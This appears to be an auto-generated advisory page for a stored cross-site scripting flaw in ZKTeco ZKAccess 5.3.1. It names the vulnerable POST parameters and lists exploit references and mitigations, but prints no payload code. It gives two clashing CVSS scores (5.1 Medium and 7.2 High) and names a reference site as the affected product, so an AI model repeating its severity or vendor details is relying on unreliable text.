CVE-2016-20032
Published: 16 March 2026
Summary
CVE-2016-20032 is a medium-severity Cross-site Scripting (CWE-79) vulnerability in Cxsecurity (inferred from references). Its CVSS base score is 5.1 (Medium).
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 4.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2016-20032 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting ZKTeco ZKAccess Security System version 5.3.1. The flaw enables attackers to inject and store malicious HTML and JavaScript payloads via the 'holiday_name' and 'memo' POST parameters, which are then executed in the browsers of users accessing the affected system.
Unauthenticated attackers (PR:N) with network access (AV:N) can exploit this vulnerability by submitting crafted HTTP requests containing script code in the specified parameters. Exploitation requires low complexity (AC:L) and no user interaction (UI:N), resulting in a scope change (S:C) that allows limited compromise of confidentiality (C:L) and integrity (I:L) with no availability impact (A:N). This yields a CVSS v3.1 base score of 7.2 (High), enabling attackers to hijack user browser sessions and steal sensitive information.
Reference advisories and exploit details are documented in sources including cxsecurity.com (WLB-2016090004), IBM X-Force Exchange (vulnerability 116479), Packet Storm Security (file 138572), Exploit-DB (exploit 40328), and VulnCheck advisory on the ZKTeco ZKAccess stored XSS issue. These publications do not specify patches or mitigations in the provided information.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2016-10819
Vulnerability details
ZKTeco ZKAccess Security System 5.3.1 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads through the 'holiday_name' and 'memo' POST parameters. Attackers can submit crafted requests with script code…
more
in these parameters to compromise user browser sessions and steal sensitive information.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS directly enables arbitrary JavaScript execution in victim browsers (T1059.007) and facilitates browser session hijacking with info theft (T1185).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires validation and sanitization of inputs such as holiday_name and memo to block script injection before storage and later execution.
Requires filtering of information outputs so that stored malicious payloads cannot be rendered and executed in user browsers.
Provides mechanisms to detect and block malicious code (including script payloads) at ingress or before delivery to client browsers.